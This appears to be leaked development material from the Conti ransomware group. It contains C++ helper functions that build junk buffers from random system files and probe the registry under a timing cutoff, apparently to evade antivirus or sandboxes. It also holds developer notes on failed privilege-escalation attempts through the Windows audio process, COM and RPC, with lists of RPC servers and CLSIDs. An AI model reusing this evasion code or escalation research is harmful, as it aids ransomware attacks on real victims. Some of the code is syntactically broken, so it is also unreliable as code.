Conti.Functions()

GetRandomBuf.c

char* GetRandomBuf()
{
	char tempFileName[MAX_PATH];
	char targetFileName[MAX_PATH];
	// random
	size_t randomNum = 8;
	WIN32_FIND_DATAA ffd;

	DWORD size = 0;

	GetSystemDirectoryA((LPSTR)tempFileName, (UINT)MAX_PATH);
	GetSystemDirectoryA((LPSTR)targetFileName, (UINT)MAX_PATH);
	StringCchCatA(tempFileName, MAX_PATH, "\\\*");

	HANDLE f = FindFirstFileA(tempFileName, &ffd);

	size_t count = 0;
	char** fileNamesArr = new char*[5000];
	DWORD rbRead;

	for (size_t i = 0; i < 5000; ++i)
		fileNamesArr[i] = new char[MAX_PATH];

	// set randomly
	size_t fileSize = 150000;
	do
	{
		if (!(ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
		{
			if (ffd.nFileSizeLow > fileSize)
			{
				int a = 1;
				int b = 2;
				StringCchCopyA(fileNamesArr[count], MAX_PATH, ffd.cFileName;)
				++count;

				a += b + count;
			}
		}
	} while (FindNextFileA(f, &ffd) && count < 5000);

	FindClose((HANDLE)f);

	randomNum %= count;

	StringCchCatA(targetFileName, MAX_PATH, "\\\");

	StringCchCatA(targetFileName, MAX_PATH, fileNamesArr[randomNum]);

	HANDLE hFile = CreateFileA(targetFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);

	size = (DWORD)GetFileSize((HANDLE)hFile, nullptr);

	char* buf = new char[size];
	
	ReadFile((HANDLE)hFile, buf, size, &rbRead, nullptr);

	for (DWORD i = 0; i < fileSize; ++i)
	{
		if (buf[i] == 0)
		{
			size_t z = i;
			size_t t = i * 32;
			size_t y = i * 123 - 44 + i;
			z = t * y % 255;

			if (z != 0)
				buf[i] = z;
			else
				buf[i] = z + 23;

			i = 0;
		}
	}

	/*delete[] fileNamesArr;
	pCloseHandle(hFile);
	*/
	buf[fileSize - 1] = 0;

	return buf;
}
[24.09.21 15:37:40] orval: ``
bool QueryReg(char* buf, DWORD startTime)
{
	size_t result = 0;
	LSTATUS errCode = 0;
	HKEY hKey;
	size_t step = 0;
	//do random
	char* parameterName = (char*) "zsadsgjea";
	//do random
	char* parameterValue = (char*) "svogfiifotuz";
	DWORD dataSize = 12;

	while (step < StrLen(buf) - 18)
	{
		char* temp = (char*)MyHeapAlloc(12);// new char[12];
		temp[11] = 0;

		m_memcpy(temp, buf + step, 11);

		errCode = (LSTATUS)RegOpenKeyExA((HKEY)HKEY_CURRENT_USER, temp, (DWORD)0, (REGSAM)KEY_READ, &hKey);

		if (errCode != ERROR_FILE_NOT_FOUND && hKey)
		{
			errCode = (LSTATUS)RegQueryValueExA(hKey, (LPCSTR)parameterName, nullptr, nullptr, (LPBYTE)parameterValue, &dataSize);

			if (errCode != ERROR_SUCCESS && hKey)
				++result;
		}

		//step += 18;
		step += 40;
		
		free(temp);

		if ((DWORD)GetTickCount() - startTime > 1000 * 20)
			break;
	}

	return result > 10;
}

Negative result by audio so far

1. injections into the process with higher primes do not work (via COM too)
2. between the audio process and COM no interaction via LPC/ALPC/PIPE etc., that is, the operation of "server" in this case is not possible, plus ALPC is filtered by SID
3. there is no sense to load RPC in your process because we have a bent user
   In particular, here are all the RPC servers on the test machine
   [+] Exe starting RPC Server: C:{Windows\System32\AppVShNotify.exe
   [+] Exe starting RPC Server: C:\Windows\System32\BioIso.exe
   [+] Exe starting RPC Server: C:Windows\System32\ByteCodeGenerator.exe
   [+] Exe starting RPC Server: C:{Windows\System32\FsIso.exe
   [+] Exe starting RPC Server: C:Windows\System32\FXSSVC.exe
   [+] Exe starting RPC Server: C:{Windows\System32\LsaIso.exe
   [+] Exe starting RPC Server: C:Windows\System32\lsass.exe
   [+] Exe starting RPC Server: C:{Windows\System32\mpnotify.exe
   [+] Exe starting RPC Server: C:{Windows\System32\NetEvtFwdr.exe
   [+] Exe starting RPC Server: C:{Windows\System32\NgcIso.exe
   [+] Exe starting RPC Server: C:Windows\System32\rdpclip.exe
   [+] Exe starting RPC Server: C:\Windows\System32\rdpinit.exe
   [+] Exe starting RPC Server: C:\Windows\System32\rdpshell.exe
   [+] Exe starting RPC Server: C:\Windows\System32\services.exe
   [+] Exe starting RPC Server: C:Windows\System32\SgrmLpac.exe
   [+] Exe starting RPC Server: C:{Windows\System32\svchost.exe
   [+] Exe starting RPC Server: C:Windows\System32\TCPSVCS.EXE
   [+] Exe starting RPC Server: C:{Windows\System32\WaaSMedicAgent.exe
   [+] Exe starting RPC Server: C:\Windows\System32\wimserv.exe
   [+] Exe starting RPC Server: C:\Windows\System32\wininit.exe
   [+] Exe starting RPC Server: C:\Windows\System32\winlogon.exe
   [+] Exe starting RPC Server: C:\Windows\System32\wlanext.exe
   [+] Exe starting RPC Server: C:{Windows\System32\IME\IMJP\IMJPDCT.EXE

HKEY_CLASSES_ROOT\CLSID{27F71832-6815-48CB-902A-7A1D891BA962} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{294935CE-F637-4E7C-A41B-AB255460B862} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{41FCCC3A-1FA1-4949-953A-6EE61C46A4D1} Microsoft.Audio.AudioClient Binder - 0 cmd
HKEY_CLASSES_ROOT\CLSID{444F7305-1D7D-4BE9-8C29-CC3F1D220C40} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{562462DD-4F9A-4110-9D6A-C3CA0407FF76} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{69A95A38-C637-46A0-9FB2-1C939AEBF2E8} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{6EC153C1-371E-47E1-A896-2F7F80EB7842} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{73843B93-848F-453B-953D-2E5B911429DC} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{870AF99C-171D-4f9e-AF0D-E63DF40C2BC9} - 9 cmd
HKEY_CLASSES_ROOT\CLSID{8D9945C3-A621-4F52-8641-6D8B755F42E2} - 12 cmd system blocked
HKEY_CLASSES_ROOT\CLSID{ede7f087-890f-491c-b906-9abb31896960} CLSID_EuVolumeNotificationCallback - 0 cmd
HKEY_CLASSES_ROOT\CLSID{FD7F2B29-24D0-4B5C-B177-592C39F9CA10} psfactorybuffer - 2 cmd